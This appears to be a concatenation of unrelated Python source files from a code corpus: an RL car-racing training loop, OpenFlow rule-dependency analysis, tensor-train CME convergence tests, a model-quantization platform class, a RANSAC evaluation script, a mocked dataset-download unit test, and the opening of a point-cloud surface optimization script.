negative_reward_counter = negative_reward_counter + 1 if time_frame_counter > 100 and reward < 0 else 0
# Extra bonus for the model if it uses full gas
if action[1] == 1 and action[2] == 0:
reward *= 1.5
total_reward += reward
next_state = agent.process_state_image(next_state)
state_frame_stack_queue.append(next_state)
next_state_frame_stack = agent.generate_state_from_queue(state_frame_stack_queue)
agent.memorize(current_state_frame_stack, action, reward, next_state_frame_stack, done)
if done or negative_reward_counter >= 25 or total_reward < 0:
print('Episode: {}/{}, Time Frames: {}, Rewards: {:.2}, Rewards(adjusted): {:.2}, Epsilon: {:.2}'.format(
e, ENDING_EPISODE, time_frame_counter, float(real_reward), float(total_reward), float(agent.epsilon)))
break
if len(agent.memory) > TRAINING_BATCH_SIZE:
agent.replay(TRAINING_BATCH_SIZE)
time_frame_counter += 1
if e % UPDATE_TARGET_MODEL_FREQUENCY == 0:
agent.update_target_model()
if e % SAVE_TRAINING_FREQUENCY == 0:
if not os.path.isdir(save_folder):
os.makedirs(save_folder)
save_full_dir = '{}/episode_{}.h5'.format(save_folder, e)
agent.save(save_full_dir)
total_reward_list.append(total_reward)
real_reward_list.append(real_reward)
env.close()
total_reward_arr = np.asarray(total_reward_list)
real_reward_arr = np.asarray(real_reward_list)
# Plotting the rewards
fig_id = plt.figure(figsize=(12,9))
ax = fig_id.add_subplot(211)
ax.plot(total_reward_arr)
ax.set_xlabel('Episodes')
ax.set_ylabel('Reward (adjusted)')
ax = fig_id.add_subplot(212)
ax.plot(real_reward_arr)
ax.set_xlabel('Episodes')
ax.set_ylabel('Reward')
plot_full_dir = '{}/rewards.png'.format(save_folder)
plt.savefig(plot_full_dir) |
<gh_stars>1-10
"""
Methods for calculating the direct and indirect dependencies of an
OpenFlow 1.3 ruleset.
Indirect dependencies refer to all rules which shadow or goto another, directly
or indirectly. This includes across multiple tables.
For consistency, by default all functions use the headerspace implementation.
Headerspace is faster for the intersection operation, which is all that indirect
dependencies need to check.
"""
# Copyright 2019 <NAME>, Wand Network Research Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
from .utils import AttachBDD
from .rule import Rule, UniqueRules
from .headerspace import wildcard_intersect
from .utils import nullcontext
from .cuddbdd import wc_to_BDD
def add_parents_hs(R, P, reaches):
if P and R.table == next(iter(P)).table:
wc = R.match.get_wildcard()
else:
wc = R.get_goto_egress().get_wildcard()
for Rj in P:
if wildcard_intersect(wc, Rj.match.get_wildcard()):
reaches.add((R, Rj))
def add_parents_bdd(R, P, reaches, parent_to_edge=None):
""" Map all dependencies direct or indirect
"""
if P and R.table == next(iter(P)).table:
packets = R.as_BDD
else:
packets = wc_to_BDD(R.get_goto_egress().get_wildcard(), "1", "1")
for Rj in P:
if packets.intersection(Rj.as_BDD):
reaches.add((R, Rj))
if parent_to_edge is not None:
parent_to_edge[Rj].add(R)
def build_table_deps(ruleset, use_bdd=False):
""" Builds the dependencies within a table (direct and indirect)
Loosely based on CacheFlow (2016), algorithm 1
ruleset: Takes a list of Rule objects
use_bdd: Defaults to False
return: A mapping from edges to packet-space on that path.
An edge is a tuple (child, parent) and add_parents selects the
packet-space encoding.
"""
reaches = set()
_AttachBDD = AttachBDD if use_bdd else nullcontext
with _AttachBDD(ruleset):
for R in ruleset:
potential_parents = [Rj for Rj in ruleset
if Rj.priority < R.priority or Rj.table > R.table]
if use_bdd:
add_parents_bdd(R, potential_parents, reaches)
else:
add_parents_hs(R, potential_parents, reaches)
return reaches
def build_prefix_table_deps(ruleset):
""" Finds all direct and indirect dependencies of a prefix table
Requires a single IPv4 prefix table as input
Requires a ruleset with a default rule at priority 0.
Assumes that rules are in the correct format.
Internally uses headerspace wildcards for calculations as intersection
is faster than BDDs and this saves an extra conversion step.
ruleset: A list of Rule objects, must be a single IPv4 prefix table
return: A iterable list of (child, parent) dependencies
"""
# Sort subnets from 0.0.0.0 -> 255.255.255.255 then if required /0 -> /32
ruleset = sorted(ruleset,
key=lambda x: (x.match["IPV4_DST"][0], x.priority))
reaches = list()
assert ruleset[0].priority == 0
assert ruleset[0].match.get_wildcard() == Rule().match.get_wildcard()
# Add the default rule to the bottom of the chain
chain = [ruleset[0]]
for rule in ruleset[1:]:
# As rules are ordered, once we stop overlapping a rule we know
# no subsequent rules will. So pop that.
while not wildcard_intersect(chain[-1].match.get_wildcard(),
rule.match.get_wildcard()):
chain.pop()
# We can only overlap with one rule and will do so completely
for c_rule in chain:
reaches.append((rule, c_rule))
chain.append(rule)
return reaches
def _recurse_goto_deps(tables, table, match, parents, edges):
for rule in tables[table]:
next_table = rule.instructions.goto_table
if next_table is None:
if (match is not None and
not wildcard_intersect(match.get_wildcard(), rule.match.get_wildcard())):
continue
else:
try:
egress = rule.get_goto_egress(match)
except Exception:
continue
for parent in parents:
edges.add((parent, rule))
if next_table:
assert rule.instructions.goto_table > table
_recurse_goto_deps(tables, next_table, egress, parents + (rule,), edges)
def build_ruleset_deps(ruleset, build_table=build_table_deps,
use_bdd=None):
""" Build the dependencies for a multi-table ruleset
ruleset: Takes a list of Rule objects
_build_table: Algorithm within a table, build_table_deps by default
returns: A list of dependency pairs in the format
[(f1, f2), (f1, f3), ...]
"""
edges = set()
_AttachBDD = AttachBDD if use_bdd else nullcontext
with UniqueRules(), _AttachBDD(ruleset):
ruleset_tables = defaultdict(list)
for rule in ruleset:
ruleset_tables[rule.table].append(rule)
for table in ruleset_tables:
_recurse_goto_deps(ruleset_tables, table, None, tuple(), edges)
for table in ruleset_tables.values():
if use_bdd is not None:
edges.update(build_table(table, use_bdd=use_bdd))
else:
edges.update(build_table(table))
return list(edges)
|
<filename>code/simplegene_tt_convergence.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 9 10:01:49 2020
@author: ion
"""
import tensorflow as tf
import t3f
import numpy as np
import matplotlib.pyplot as plt
from CME import CME
import timeit
import scipy.integrate
import numba
import scipy.sparse
from tt_extra import mat_to_tt
import tt
import tt.amen
from ttInt import ttInt
# define reaction
rates = np.array([0.015,0.002,0.1,0.01])
Pre =np.array( [[1,0],[1,0],[0,0],[0,1]])
Post = np.array([[1,1],[0,0],[1,0],[0,0]])
Props = [ lambda x: x[:,0], lambda x: x[:,0] , lambda x: x[:,0]*0+1 , lambda x: x[:,1] ]
# construct the model and the CME operator
N = [80,120] # state truncation
mdl = CME(N, Pre,Post,rates,Props)
mdl.construct_generator2(to_tf=False)
A_tt = mdl.construct_generator_tt()
Initial = [2,4]
P0 = np.zeros(N)
P0[Initial[0],Initial[1]] = 1.0
P0_tt = tt.tensor(P0)
dT = 128
Nt = 8
time = np.arange(Nt+1) * dT
# Reference solution
print('Reference solution...')
tme_ode45 = timeit.time.time()
mdl.construct_generator2(to_tf=False)
Gen = mdl.gen
def func(t,y):
return Gen.dot(y)
# solve CME
res = scipy.integrate.solve_ivp(func,[0,time[-1]],P0.flatten(),t_eval=time,max_step=dT/10000)
Pt = res.y.reshape(N+[-1])
P_ref = Pt[:,:,-1]
tme_ode45 = timeit.time.time() - tme_ode45
# convergence test
print('Implicit Euler...')
err_implicit = []
refinements_implicit = [16,32,64,128,256,512]
for nt in refinements_implicit:
fwd_int = ttInt(A_tt, epsilon = 1e-9, N_max = nt, dt_max = 100.0)
P_tt = P0_tt
for i in range(Nt):
P_tt = fwd_int.solve(P_tt, dT, intervals = 1)
P = P_tt.full().reshape(N)
err = np.max(np.abs(P-P_ref)) / np.max(np.abs(P_ref))
err_implicit.append(err)
print('nt ',nt,' error inf ',err)
# convergence test
print('<NAME>...')
err_cn = []
refinements_cn = [16,32,64,128,256,512]
for nt in refinements_cn:
fwd_int = ttInt(A_tt, epsilon = 1e-11, N_max = nt, dt_max = 100.0,method='crank–nicolson')
P_tt = P0_tt
for i in range(Nt):
P_tt = fwd_int.solve(P_tt, dT, intervals = 1)
P = P_tt.full().reshape(N)
err = np.max(np.abs(P-P_ref)) / np.max(np.abs(P_ref))
err_cn.append(err)
print('nt ',nt,' error inf ',err)
# convergence test
print('Cheby...')
err_ch = []
refinements_ch = [2,4,6,8,10,12,14,16,18,20,22,24,28,32]
for nt in refinements_ch:
fwd_int = ttInt(A_tt, epsilon = 1e-14, N_max = nt, dt_max = 1000.0,method='cheby')
P_tt = P0_tt
for i in range(Nt):
P_tt = fwd_int.solve(P_tt, dT, intervals = 1)
P_tt = P_tt.round(1e-14)
P = P_tt.full().reshape(N)
err = np.max(np.abs(P-P_ref)) / np.max(np.abs(P_ref))
err_ch.append(err)
print('nt ',nt,' error inf ',err)
# convergence test
print('Legendre...')
err_le = []
refinements_le = [2,4,6,8,10,12,14,16,18,20,22,24,28,32]
for nt in refinements_le:
fwd_int = ttInt(A_tt, epsilon = 1e-14, N_max = nt, dt_max = 1000.0,method='legendre')
P_tt = P0_tt
for i in range(Nt):
P_tt = fwd_int.solve(P_tt, dT, intervals = 1)
P_tt = P_tt.round(1e-14)
P = P_tt.full().reshape(N)
err = np.max(np.abs(P-P_ref)) / np.max(np.abs(P_ref))
err_le.append(err)
print('nt ',nt,' error inf ',err)
# convergence test
print('Epsilon of the solver...')
err_eps = []
refinements_epsilon = 10.0 ** (-np.arange(1,11))
for eps in refinements_epsilon:
fwd_int = ttInt(A_tt, epsilon = eps, N_max = 16, dt_max = 1000.0,method='cheby')
P_tt = P0_tt
for i in range(Nt):
P_tt = fwd_int.solve(P_tt, dT, intervals = 1)
P = P_tt.full().reshape(N)
err = np.max(np.abs(P-P_ref)) / np.max(np.abs(P_ref))
err_eps.append(err)
print('epsilon ',eps,' error inf ',err)
print('Epsilon vs Nt ...')
refinements_epsilon_2 = 10.0 ** (-np.arange(1,13))
refinements_ch2 = [2,3,4,5,6,7,8]
err_eps_ch = []
for eps in refinements_epsilon_2:
err_temp = []
for nt in refinements_ch2:
fwd_int = ttInt(A_tt, epsilon = eps, N_max = nt, dt_max = 1000.0,method='cheby')
P_tt = P0_tt
for i in range(Nt):
P_tt = fwd_int.solve(P_tt, dT, intervals = 1)
P = P_tt.full().reshape(N)
err = np.max(np.abs(P-P_ref)) / np.max(np.abs(P_ref))
err_temp.append(err)
print('epsilon ',eps,' nt ',nt,' error inf ',err)
err_eps_ch.append(err_temp)
#%% plots
import tikzplotlib
plt.figure()
plt.loglog(refinements_implicit,err_implicit)
plt.loglog(refinements_cn[:-1],err_cn[:-1])
plt.loglog(refinements_ch[:],err_ch[:])
# plt.loglog(refinements_le[:],err_le[:])
plt.xlabel(r'$N_t$')
plt.ylabel(r'max relative error')
plt.grid()
plt.legend(['Implicit Euler','Crank-Nicolson','Chebyshev'])
tikzplotlib.save('convergence_Nt.tex')
# plt.figure()
# plt.loglog(dT/np.array(refinements_implicit),np.array(err_implicit))
# plt.loglog(dT/np.array(refinements_cn)[:-1],np.array(err_cn)[:-1])
# plt.xlabel(r'$\Delta t$ [s]')
# plt.ylabel(r'max relative error')
# plt.grid()
# plt.legend(['Implicit Euler','Crank-Nicolson'])
# tikzplotlib.save('convergence_dt.tex')
plt.figure()
plt.loglog(refinements_epsilon,err_eps)
plt.xlabel(r'$\epsilon$')
plt.ylabel(r'max relative error')
plt.grid()
tikzplotlib.save('convergence_eps.tex')
plt.figure()
plt.loglog(dT/np.array(refinements_ch2),np.array(err_eps_ch).transpose())
plt.xlabel(r'$\Delta t$ [s]')
plt.ylabel(r'max relative error')
plt.legend([r'$\epsilon=$'+str(eps) for eps in refinements_epsilon_2])
plt.grid()
tikzplotlib.save('convergence_eps_multiple.tex')
plt.figure()
plt.loglog(np.array(refinements_epsilon_2),np.array(err_eps_ch))
plt.xlabel(r'$\epsilon$')
plt.ylabel(r'max relative error')
plt.legend([r'$T=$'+str(tmp)+'' for tmp in np.array(refinements_ch2)])
plt.grid()
tikzplotlib.save('convergence_Nt_multiple.tex') |
# Copyright 2022 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import pprint
from typing import Any, Dict
from model_compression_toolkit.common.target_platform.current_tp_model import _current_tp_model, \
get_current_tp_model
from model_compression_toolkit.common.target_platform.fusing import Fusing
from model_compression_toolkit.common.target_platform.target_platform_model_component import \
TargetPlatformModelComponent
from model_compression_toolkit.common.target_platform.op_quantization_config import OpQuantizationConfig, \
QuantizationConfigOptions
from model_compression_toolkit.common.target_platform.operators import OperatorsSetBase
from model_compression_toolkit.common.immutable import ImmutableClass
from model_compression_toolkit.common.logger import Logger
def get_default_quantization_config_options() -> QuantizationConfigOptions:
"""
Returns: The default QuantizationConfigOptions of the model. This is the options
to use when a layer's options is queried and it wasn't specified in the TargetPlatformCapabilities.
The default QuantizationConfigOptions always contains a single option.
"""
return get_current_tp_model().default_qco
def get_default_quantization_config():
"""
Returns: The default OpQuantizationConfig of the model. This is the OpQuantizationConfig
to use when a layer's options is queried and it wasn't specified in the TargetPlatformCapabilities.
This OpQuantizationConfig is the single option in the default QuantizationConfigOptions.
"""
return get_current_tp_model().get_default_op_quantization_config()
class TargetPlatformModel(ImmutableClass):
"""
Modeling of the hardware the quantized model will use during inference.
The model contains definition of operators, quantization configurations of them, and
fusing patterns so that multiple operators will be combined into a single operator.
"""
def __init__(self,
default_qco: QuantizationConfigOptions,
name="default_tp_model"):
"""
Args:
default_qco (QuantizationConfigOptions): Default QuantizationConfigOptions to use for operators that their QuantizationConfigOptions are not defined in the model.
name (str): Name of the model.
"""
super().__init__()
self.name = name
self.operator_set = []
assert isinstance(default_qco, QuantizationConfigOptions)
assert len(default_qco.quantization_config_list) == 1, \
f'Default QuantizationConfigOptions must contain only one option'
self.default_qco = default_qco
self.fusing_patterns = []
def get_config_options_by_operators_set(self,
operators_set_name: str) -> QuantizationConfigOptions:
"""
Get the QuantizationConfigOptions of a OperatorsSet by the OperatorsSet name.
If the name is not in the model, the default QuantizationConfigOptions is returned.
Args:
operators_set_name: Name of OperatorsSet to get.
Returns:
QuantizationConfigOptions to use for ops in OperatorsSet named operators_set_name.
"""
for op_set in self.operator_set:
if operators_set_name == op_set.name:
return op_set.qc_options
return get_default_quantization_config_options()
def get_default_op_quantization_config(self) -> OpQuantizationConfig:
"""
Returns: The default OpQuantizationConfig of the TargetPlatformModel.
"""
assert len(self.default_qco.quantization_config_list) == 1, \
f'Default quantization configuration options must contain only one option,' \
f' but found {len(get_current_tp_model().default_qco.quantization_config_list)} configurations.'
return self.default_qco.quantization_config_list[0]
def is_opset_in_model(self,
opset_name: str) -> bool:
"""
Check whether an operators set is defined in the model or not.
Args:
opset_name: Operators set name to check.
Returns:
Whether an operators set is defined in the model or not.
"""
return opset_name in [x.name for x in self.operator_set]
def get_opset_by_name(self,
opset_name: str) -> OperatorsSetBase:
"""
Get an OperatorsSet object from the model by its name.
If name is not in the model - None is returned.
Args:
opset_name: OperatorsSet name to retrieve.
Returns:
OperatorsSet object with the name opset_name, or None if opset_name is not in the model.
"""
opset_list = [x for x in self.operator_set if x.name == opset_name]
assert len(opset_list) <= 1, f'Found more than one OperatorsSet in' \
f' TargetPlatformModel with the name {opset_name}. ' \
f'OperatorsSet name must be unique.'
if len(opset_list) == 0: # opset_name is not in the model.
return None
return opset_list[0] # There's one opset with that name
def append_component(self,
tp_model_component: TargetPlatformModelComponent):
"""
Attach a TargetPlatformModel component to the model. Components can be for example:
Fusing, OperatorsSet, etc.
Args:
tp_model_component: Component to attach to the model.
"""
if isinstance(tp_model_component, Fusing):
self.fusing_patterns.append(tp_model_component)
elif isinstance(tp_model_component, OperatorsSetBase):
self.operator_set.append(tp_model_component)
else:
raise Exception(f'Trying to append an unfamiliar TargetPlatformModelComponent of type: {type(tp_model_component)}')
def __enter__(self):
"""
Start defining the TargetPlatformModel using 'with'.
Returns: Initialized TargetPlatformModel object.
"""
_current_tp_model.set(self)
return self
def __exit__(self, exc_type, exc_value, tb):
"""
Finish defining the TargetPlatformModel at the end of the 'with' clause.
Returns the final and immutable TargetPlatformModel instance.
"""
if exc_value is not None:
print(exc_value, exc_value.args)
raise exc_value
self.__validate_model() # Assert that model is valid.
_current_tp_model.reset()
self.initialized_done() # Make model immutable.
return self
def __validate_model(self):
"""
Assert model is valid.
Model is invalid if, for example, it contains multiple operator sets with the same name,
as their names should be unique.
"""
opsets_names = [op.name for op in self.operator_set]
if (len(set(opsets_names)) != len(opsets_names)):
Logger.error(f'OperatorsSet must have unique names')
def get_default_config(self) -> OpQuantizationConfig:
"""
Returns:
"""
assert len(self.default_qco.quantization_config_list) == 1, \
f'Default quantization configuration options must contain only one option,' \
f' but found {len(self.default_qco.quantization_config_list)} configurations.'
return self.default_qco.quantization_config_list[0]
def get_info(self) -> Dict[str, Any]:
"""
Returns: Dictionary that summarizes the TargetPlatformModel properties (for display purposes).
"""
return {"Model name": self.name,
"Default quantization config": self.get_default_config().get_info(),
"Operators sets": [o.get_info() for o in self.operator_set],
"Fusing patterns": [f.get_info() for f in self.fusing_patterns]
}
def show(self):
"""
Display the TargetPlatformModel.
"""
pprint.pprint(self.get_info(), sort_dicts=False)
|
<reponame>hosang/ransac-tutorial-2020-data
# select the data
import numpy as np
import matplotlib.pyplot as plt
import h5py
import cv2
from utils import *
from tqdm import tqdm
import os
from metrics import *
import argparse
def evaluate_results(IN_DIR, seq, models, inliers):
ang_errors = {}
matches = load_h5(f'{IN_DIR}/{seq}/matches.h5')
K1_K2 = load_h5(f'{IN_DIR}/{seq}/K1_K2.h5')
R = load_h5(f'{IN_DIR}/{seq}/R.h5')
T = load_h5(f'{IN_DIR}/{seq}/T.h5')
F_pred, inl_mask = models, inliers
for k, m in tqdm(matches.items()):
if F_pred[k] is None:
ang_errors[k] = 3.14
continue
img_id1 = k.split('-')[0]
img_id2 = k.split('-')[1]
K1 = K1_K2[k][0][0]
K2 = K1_K2[k][0][1]
try:
E_cv_from_F = get_E_from_F(F_pred[k], K1, K2)
except:
print ("Fail")
E = np.eye(3)
R1 = R[img_id1]
R2 = R[img_id2]
T1 = T[img_id1]
T2 = T[img_id2]
dR = np.dot(R2, R1.T)
dT = T2 - np.dot(dR, T1)
if args.method.lower() == 'load_oanet': #They provided not the mask, but actual correspondences
pts1 = inl_mask[k][:, :2] # coordinates in image 1
pts2 = inl_mask[k][:, 2:] # coordinates in image 2
elif args.method.lower() == 'load_oanet_degensac': #They provided not the mask, but actual correspondences
pts1 = inl_mask[k][:, :2] # coordinates in image 1
pts2 = inl_mask[k][:, 2:] # coordinates in image 2
else:
pts1 = m[inl_mask[k],:2] # coordinates in image 1
pts2 = m[inl_mask[k],2:] # coordinates in image 2
p1n = normalize_keypoints(pts1, K1)
p2n = normalize_keypoints(pts2, K2)
ang_errors[k] = max(eval_essential_matrix(p1n, p2n, E_cv_from_F, dR, dT))
return ang_errors
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
"--split",
default='val',
type=str,
help='split to run on. Can be val or test')
parser.add_argument(
"--method", default='cv2F', type=str,
help=' can be cv2f, pyransac, degensac, sklearn' )
parser.add_argument(
"--inlier_th",
default=0.75,
type=float,
help='inlier threshold. Default is 0.75')
parser.add_argument(
"--conf",
default=0.999,
type=float,
help='confidence Default is 0.999')
parser.add_argument(
"--maxiter",
default=100000,
type=int,
help='max iter Default is 100000')
parser.add_argument(
"--match_th",
default=0.85,
type=float,
help='match filetring th. Default is 0.85')
parser.add_argument(
"--force",
default=False,
type=bool,
help='Force recompute if exists')
parser.add_argument(
"--data_dir",
default='f_data',
type=str,
help='path to the data')
args = parser.parse_args()
if args.split not in ['val', 'test']:
raise ValueError('Unknown value for --split')
if args.method.lower() not in ['cv2f', 'kornia', 'cv2eimg','load_oanet','load_oanet_degensac', 'pyransac', 'load_dfe', 'nmnet2', 'degensac', 'sklearn', 'cne', 'acne']:
raise ValueError('Unknown value for --method')
NUM_RUNS = 1
if args.split == 'test':
NUM_RUNS = 3
if args.method.lower() in ['load_oanet','load_oanet_degensac', 'load_dfe', 'nmnet2', 'cne', 'acne']:
NUM_RUNS=1
params = {"maxiter": args.maxiter,
"inl_th": args.inlier_th,
"conf": args.conf,
"match_th": args.match_th
}
problem = 'f'
OUT_DIR = get_output_dir(problem, args.split, args.method, params)
IN_DIR = os.path.join(args.data_dir, args.split)
if not os.path.isdir(OUT_DIR):
os.makedirs(OUT_DIR)
num_cores = int(len(os.sched_getaffinity(0)) * 0.9)
all_maas = []
for run in range(NUM_RUNS):
seqs = os.listdir(IN_DIR)
for seq in seqs:
print (f'Working on {seq}')
in_models_fname = os.path.join(OUT_DIR, f'submission_models_seq_{seq}_run_{run}.h5')
in_inliers_fname = os.path.join(OUT_DIR, f'submission_inliers_seq_{seq}_run_{run}.h5')
out_errors_fname = os.path.join(OUT_DIR, f'errors_seq_{seq}_run_{run}.h5')
out_maa_fname = os.path.join(OUT_DIR, f'maa_seq_{seq}_run_{run}.h5')
if not os.path.isfile(in_models_fname) or not os.path.isfile(in_inliers_fname):
print (f"Submission file {in_inliers_fname} is missing, cannot evaluate, skipping")
continue
models = load_h5(in_models_fname)
inlier_masks = load_h5(in_inliers_fname)
if os.path.isfile(out_errors_fname) and not args.force:
print (f"Submission file {in_inliers_fname} exists, read it")
error = load_h5(out_errors_fname)
else:
error = evaluate_results(IN_DIR, seq, models, inlier_masks)
save_h5(error, out_errors_fname)
mAA = calc_mAA_FE({seq: error})
print (f" mAA {seq} = {mAA[seq]:.5f}")
save_h5({"mAA": mAA[seq]}, out_maa_fname)
all_maas.append(mAA[seq])
out_maa_final_fname = os.path.join(OUT_DIR, f'maa_FINAL.h5')
final_mAA = (np.array(all_maas)).mean()
print (f" mAA total = {final_mAA:.5f}")
save_h5({"mAA": final_mAA}, out_maa_final_fname)
print ('Done!')
|
<filename>tests/zookeeper/test_download_center.py
import hashlib
import io
import json
import os
import responses
import sys
import unittest
import zipfile
from data_mine import Collection
from data_mine.utils import datamine_cache_dir
from data_mine.zookeeper import download_dataset
from pyfakefs.fake_filesystem_unittest import TestCase
if sys.version_info >= (3, 3):
from unittest.mock import patch
else:
from mock import patch
class TestDownloadDatasetFn(TestCase):
def setUp(self):
self.setUpPyfakefs()
self.FAKE_DATASET = Collection.RACE
self.FAKE_URL_DATA1 = self.fake_url_data()
self.FAKE_URL_DATA2 = b"This is a JSON file."
self.FAKE_CONFIG = {
self.FAKE_DATASET.name: json.loads("""{{
"requirements": [
{{
"URL": "http://fake-website.com/my/files.zip",
"SHA256": "{0}"
}},
{{
"URL": "http://fake-website.com/my2/file.json",
"SHA256": "{1}"
}}
]
}}""".format(
self.bytes_sha256(self.FAKE_URL_DATA1),
self.bytes_sha256(self.FAKE_URL_DATA2)
))
} # We use double braces so as to force `format` ignore them.
# Returns a bytestream with the contents of the fake URL (zip archive).
def fake_url_data(self):
all_files = [
("1.txt", io.BytesIO(b"First question")),
("2.txt", io.BytesIO(b"Second question")),
("dir/3.txt", io.BytesIO(b"Third question"))
]
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, "a") as zip_file:
for file_name, data in all_files:
zip_file.writestr(file_name, data.getvalue())
return zip_buffer.getvalue()
# Computes the SHA256 of a bytestream and returns the value in hex.
def bytes_sha256(self, bytestream):
sha256 = hashlib.sha256()
sha256.update(bytestream)
return sha256.hexdigest()
@patch('data_mine.zookeeper.download_center.load_datasets_config')
def test_dataset_not_downloaded_if_locally_available(self, mock_fn):
def fake_integrity_check(dataset_id):
self.assertEqual(dataset_id, Collection.RACE)
return True
return_code = download_dataset(Collection.RACE, fake_integrity_check)
mock_fn.assert_not_called()
self.assertEqual(return_code, 1)
@responses.activate
@patch('data_mine.zookeeper.download_center.load_datasets_config')
def test_dataset_is_downloaded_if_missing(self, mock_config):
mock_config.return_value = self.FAKE_CONFIG
responses.add(responses.GET, "http://fake-website.com/my/files.zip",
body=self.FAKE_URL_DATA1, status=200,
headers={'content-length': str(len(self.FAKE_URL_DATA1))}, # noqa: E501
stream=True)
responses.add(responses.GET, "http://fake-website.com/my2/file.json",
body=self.FAKE_URL_DATA2, status=200,
headers={'content-length': str(len(self.FAKE_URL_DATA2))}, # noqa: E501
stream=True)
return_code = download_dataset(Collection.RACE, lambda _: False)
self.assertEqual(return_code, 2)
data_dir = os.path.join(datamine_cache_dir(), self.FAKE_DATASET.name)
self.assertEqual(
open(os.path.join(data_dir, "1.txt"), "rt").read(),
"First question"
)
self.assertEqual(
open(os.path.join(data_dir, "2.txt"), "rt").read(),
"Second question"
)
self.assertEqual(
open(os.path.join(data_dir, "dir/3.txt"), "rt").read(),
"Third question"
)
self.assertEqual(
open(os.path.join(data_dir, "file.json"), "rt").read(),
"This is a JSON file."
)
@responses.activate
@patch('data_mine.zookeeper.download_center.load_datasets_config')
def test_exception_raised_if_url_not_reachable(self, mock_config):
# We also check that the dataset directory is not created if existing.
os.makedirs(
os.path.join(datamine_cache_dir(), self.FAKE_DATASET.name),
mode=0o755
)
mock_config.return_value = self.FAKE_CONFIG
with self.assertRaises(Exception):
download_dataset(Collection.RACE, lambda _: False)
if __name__ == '__main__':
unittest.main()
|
<reponame>raphaelsulzer/shape_as_points
import torch
import trimesh
import shutil, argparse, time, os, glob
import numpy as np; np.set_printoptions(precision=4)
import open3d as o3d
from torch.utils.tensorboard import SummaryWriter
from torchvision.utils import save_image
from torchvision.io import write_video
from src.optimization import Trainer
from src.utils import load_config, update_config, initialize_logger, \
get_learning_rate_schedules, adjust_learning_rate, AverageMeter,\
update_optimizer, export_pointcloud
from skimage import measure
from plyfile import PlyData
from pytorch3d.ops import sample_points_from_meshes
from pytorch3d.io import load_objs_as_meshes
from pytorch3d.structures import Meshes
def main():
parser = argparse.ArgumentParser(description='MNIST toy experiment')
parser.add_argument('config', type=str, help='Path to config file.')
parser.add_argument('--no_cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1457, metavar='S',
help='random seed')
args, unknown = parser.parse_known_args()
cfg = load_config(args.config, 'configs/default.yaml')
cfg = update_config(cfg, unknown)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
data_type = cfg['data']['data_type']
data_class = cfg['data']['class']
print(cfg['train']['out_dir'])
# PYTORCH VERSION > 1.0.0
assert(float(torch.__version__.split('.')[-3]) > 0)
# boiler-plate
if cfg['train']['timestamp']:
cfg['train']['out_dir'] += '_' + time.strftime("%Y_%m_%d_%H_%M_%S")
logger = initialize_logger(cfg)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
shutil.copyfile(args.config,
os.path.join(cfg['train']['out_dir'], 'config.yaml'))
# tensorboardX writer
tblogdir = os.path.join(cfg['train']['out_dir'], "tensorboard_log")
if not os.path.exists(tblogdir):
os.makedirs(tblogdir)
writer = SummaryWriter(log_dir=tblogdir)
# initialize o3d visualizer
vis = None
if cfg['train']['o3d_show']:
vis = o3d.visualization.Visualizer()
vis.create_window(width=cfg['train']['o3d_window_size'],
height=cfg['train']['o3d_window_size'])
# initialize dataset
if data_type == 'point':
if cfg['data']['object_id'] != -1:
data_paths = sorted(glob.glob(cfg['data']['data_path']))
data_path = data_paths[cfg['data']['object_id']]
print('Loaded %d/%d object' % (cfg['data']['object_id']+1, len(data_paths)))
else:
data_path = cfg['data']['data_path']
print('Data loaded')
ext = data_path.split('.')[-1]
if ext == 'obj': # have GT mesh
mesh = load_objs_as_meshes([data_path], device=device)
# scale the mesh into unit cube
verts = mesh.verts_packed()
N = verts.shape[0]
center = verts.mean(0)
mesh.offset_verts_(-center.expand(N, 3))
scale = max((verts - center).abs().max(0)[0])
mesh.scale_verts_((1.0 / float(scale)))
# important for our DPSR to have the range in [0, 1), not reaching 1
mesh.scale_verts_(0.9)
target_pts, target_normals = sample_points_from_meshes(mesh,
num_samples=200000, return_normals=True)
elif ext == 'ply': # only have the point cloud
plydata = PlyData.read(data_path)
vertices = np.stack([plydata['vertex']['x'],
plydata['vertex']['y'],
plydata['vertex']['z']], axis=1)
normals = np.stack([plydata['vertex']['nx'],
plydata['vertex']['ny'],
plydata['vertex']['nz']], axis=1)
N = vertices.shape[0]
center = vertices.mean(0)
scale = np.max(np.max(np.abs(vertices - center), axis=0))
vertices -= center
vertices /= scale
vertices *= 0.9
target_pts = torch.tensor(vertices, device=device)[None].float()
target_normals = torch.tensor(normals, device=device)[None].float()
mesh = None # no GT mesh
if not torch.is_tensor(center):
center = torch.from_numpy(center)
if not torch.is_tensor(scale):
scale = torch.from_numpy(np.array([scale]))
data = {'target_points': target_pts,
'target_normals': target_normals, # normals are never used
'gt_mesh': mesh}
else:
raise NotImplementedError
# save the input point cloud
if 'target_points' in data.keys():
outdir_pcl = os.path.join(cfg['train']['out_dir'], 'target_pcl.ply')
if 'target_normals' in data.keys():
export_pointcloud(outdir_pcl, data['target_points'], data['target_normals'])
else:
export_pointcloud(outdir_pcl, data['target_points'])
# save oracle PSR mesh (mesh from our PSR using GT point+normals)
if data.get('gt_mesh') is not None:
gt_verts, gt_faces = data['gt_mesh'].get_mesh_verts_faces(0)
pts_gt, norms_gt = sample_points_from_meshes(data['gt_mesh'],
num_samples=500000, return_normals=True)
pts_gt = (pts_gt + 1) / 2
